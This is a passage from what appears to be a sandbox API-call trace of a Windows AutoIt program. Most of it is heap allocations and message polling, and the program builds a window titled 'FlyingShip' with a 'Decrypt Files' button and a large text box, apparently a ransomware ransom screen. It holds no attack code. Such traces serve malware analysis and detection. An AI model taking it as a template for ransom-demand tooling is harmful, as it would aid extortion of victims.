(HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6078 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99df0 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47400 [0268.392] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.392] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47400 | out: hHeap=0xb80000) returned 1 [0268.392] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda60a0 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.392] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47400 [0268.392] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda60c8 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47410 [0268.393] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ad10 | out: hHeap=0xb80000) returned 1 [0268.393] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47410 | out: hHeap=0xb80000) returned 1 [0268.393] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda60f0 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47410 [0268.393] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ad10 | out: hHeap=0xb80000) returned 1 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6118 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3aa70 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47420 [0268.393] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3aa70 | out: hHeap=0xb80000) returned 1 [0268.393] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47420 | out: hHeap=0xb80000) returned 1 [0268.393] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda6140 [0268.393] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3aa70 [0268.395] AdjustWindowRectEx (in: lpRect=0x75f52c, dwStyle=0x84c00000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x75f52c) returned 1 [0268.395] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3 GUI", lpWindowName="FlyingShip", dwStyle=0x84c00000, X=318, Y=92, nWidth=806, nHeight=678, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0xa0170 [0268.396] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.396] NtdllDialogWndProc_W () returned 0x1 [0268.396] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.396] NtdllDialogWndProc_W () returned 0x0 [0268.396] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.396] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.396] NtdllDialogWndProc_W () returned 0x0 [0268.396] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.396] NtdllDialogWndProc_W () returned 0x0 [0268.396] SetWindowLongW (hWnd=0xa0170, nIndex=-21, dwNewLong=0) returned 0 [0268.397] GetClientRect (in: hWnd=0xa0170, lpRect=0x75f52c | out: lpRect=0x75f52c) returned 1 [0268.397] GetStockObject (i=17) returned 0x18a0025 [0268.397] SendMessageW (hWnd=0xa0170, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0268.397] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.397] NtdllDialogWndProc_W () returned 0x0 [0268.397] GetCursorPos (in: lpPoint=0x75f4f8 | out: lpPoint=0x75f4f8*(x=769, y=501)) returned 1 [0268.397] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f4f8 | out: lpPoint=0x75f4f8) returned 1 [0268.397] GetAsyncKeyState (vKey=1) returned 0 [0268.397] GetAsyncKeyState (vKey=2) returned 0 [0268.397] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x28, lpTimerFunc=0x291256) returned 0x7fc1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96598 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965b0 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96580 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96568 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca78f8 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff180 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965f8 | out: hHeap=0xb80000) returned 1 [0268.397] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96628 | out: hHeap=0xb80000) returned 1 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf530 | out: hHeap=0xb80000) returned 1 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff150 | out: hHeap=0xb80000) returned 1 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf530 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96628 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff150 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965f8 [0268.398] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff180 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf580 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff170 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965c8 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff170 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96568 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff170 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96580 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff170 [0268.398] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.398] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965b0 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff170 [0268.399] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1c) returned 0xddf5a8 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa0) returned 0xdbc108 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96598 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff170 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967c0 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff290 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967d8 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2a0 [0268.399] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2b0 [0268.399] CreateWindowExW (dwExStyle=0x100, lpClassName="button", lpWindowName="Decrypt Files", dwStyle=0x50030000, X=176, Y=400, nWidth=113, nHeight=41, hWndParent=0xa0170, hMenu=0x3, hInstance=0x290000, lpParam=0x0) returned 0x90150 [0268.400] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.400] NtdllDialogWndProc_W () returned 0x2 [0268.400] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.400] NtdllDialogWndProc_W () returned 0x0 [0268.400] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.400] NtdllDialogWndProc_W () returned 0x0 [0268.400] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.400] NtdllDialogWndProc_W () returned 0x0 [0268.401] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.401] NtdllDialogWndProc_W () returned 0x0 [0268.401] GetStockObject (i=17) returned 0x18a0025 [0268.401] SendMessageW (hWnd=0x90150, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0268.401] GetClientRect (in: hWnd=0x90150, lpRect=0x75f478 | out: lpRect=0x75f478) returned 1 [0268.401] GetWindowRect (in: hWnd=0x90150, lpRect=0x75f478 | out: lpRect=0x75f478) returned 1 [0268.401] SetWindowLongW (hWnd=0x90150, nIndex=-21, dwNewLong=3) returned 0 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf5a8 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96568 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96580 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965b0 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf580 | out: hHeap=0xb80000) returned 1 [0268.401] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff180 | out: hHeap=0xb80000) returned 1 [0268.401] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf580 [0268.401] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965b0 [0268.401] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff180 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965b0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf5a8 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965b0 [0268.402] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf5d0 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96580 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96568 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965c8 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967f0 [0268.402] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.402] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96808 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2c0 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96820 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2d0 [0268.403] GetDC (hWnd=0x0) returned 0x43010772 [0268.403] GetDeviceCaps (hdc=0x43010772, index=90) returned 96 [0268.403] ReleaseDC (hWnd=0x0, hDC=0x43010772) returned 1 [0268.403] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x440a06f6 [0268.403] SendMessageW (hWnd=0x90150, Msg=0x30, wParam=0x440a06f6, lParam=0x1) returned 0x0 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96820 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96808 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96580 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96568 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967f0 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0268.403] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf5d0 | out: hHeap=0xb80000) returned 1 [0268.403] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2c0 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf5d0 [0268.403] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965c8 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967f0 [0268.404] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.404] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.404] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96568 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.404] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96580 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff2d0 [0268.404] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2) returned 0xdff2d0 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa0) returned 0xccb148 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96808 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2e0 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96820 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2f0 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96838 [0268.404] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff300 [0268.405] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff310 [0268.405] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="", dwStyle=0x503110c4, X=16, Y=56, nWidth=768, nHeight=329, hWndParent=0xa0170, hMenu=0x4, hInstance=0x290000, lpParam=0x0) returned 0x60168 [0268.412] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.412] NtdllDialogWndProc_W () returned 0x0 [0268.412] GetStockObject (i=17) returned 0x18a0025 [0268.412] SendMessageW (hWnd=0x60168, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0268.414] GetWindowTextLengthW (hWnd=0x60168) returned 0 [0268.414] SendMessageW (hWnd=0x60168, Msg=0xb1, wParam=0x0, lParam=0x0) returned 0x1 [0268.415] GetClientRect (in: hWnd=0x60168, lpRect=0x75f478 | out: lpRect=0x75f478) returned 1 [0268.415] GetWindowRect (in: hWnd=0x60168, lpRect=0x75f478 | out: lpRect=0x75f478) returned 1 [0268.415] SetWindowLongW (hWnd=0x60168, nIndex=-21, dwNewLong=4) returned 0 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967f0 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96610 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965e0 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96568 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96580 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf5d0 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2c0 | out: hHeap=0xb80000) returned 1 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf5d0 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96580 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2c0 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96568 [0268.415] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff2d0 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda3df8 [0268.415] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda3df8 | out: hHeap=0xb80000) returned 1 [0268.415] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2d0 | out: hHeap=0xb80000) returned 1 [0268.415] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf5f8 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdff2d0 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf620 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd965e0 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff330 [0268.416] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff330 | out: hHeap=0xb80000) returned 1 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdff330 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96610 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff340 [0268.416] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff340 | out: hHeap=0xb80000) returned 1 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd965c8 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf648 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd967f0 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff340 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96850 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf670 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96868 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff350 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96880 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda3df8 [0268.416] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff360 [0268.416] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff370 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96898 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96898 | out: hHeap=0xb80000) returned 1 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf698 | out: hHeap=0xb80000) returned 1 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff370 | out: hHeap=0xb80000) returned 1 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff360 | out: hHeap=0xb80000) returned 1 [0268.417] 